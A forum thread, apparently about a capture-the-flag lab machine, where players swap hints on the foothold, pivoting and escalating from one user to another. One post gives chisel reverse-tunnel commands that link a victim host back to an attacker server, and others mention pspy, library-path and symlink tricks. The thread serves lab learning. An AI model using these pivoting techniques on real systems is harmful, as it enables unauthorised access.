Quite an interesting approach. Anyway, I don’t think you can pivot with this technique. Try to run this commands for successful pivoting.
(attacker) ./chisel server -p 1337 -reverse &
(frank) ./chisel client 10.10.10.10:1337 R:3001:localhost:3001 &
Don’t forget to replace the IP address with the correct one.
So can anyone help me escalating from user F to N. For my research part, I found that c…bre app, and pivot and tried to use it. any how the app doesn’t work. I use pspy64 to look what commands were executing. and found out that user N’s app use the command with
/home/n---/converter/c--bre/bin/that-binary /home/n---/converter/processing/fb4f02db-418f-4508-9521-abbf7bc85a8d.pdf /home/n---/converter/output/fb4f02db-418f-4508-9521-abbf7bc85a8d.epub. which really doesn’t write the file to that directory. So I searched online and the user N should be running the command like
...../bin/that-binary which resulting in a library not found error. But I tried setting
LD_PATH for the
libraryblahblah.so but really no luck. So am I missing something or I am in complete wrong way? Please somebody help me.
This is now solved with unusual file extension in the input intercept. Now I can’t symlink the files that I want. any idea on this? Help me again.
Nevermind, got it. I think I will write up this part one day! very nice one!
Can I DM anybody for foothold? I think I have the correct payload but I’m not getting the result I whish
Edit: finally got my payload working
And rooted. Definitely an insane machine. Loved the foothold part. Root was a bit confusing but when you understand what you need to target and focus it’s doable.
Thanks for the box
still need some help in the escalation from user f**** to user n***
anyone that can help plz?
need help with payload for the root part (just correct syntax)
can some someone give me a nudge for initial access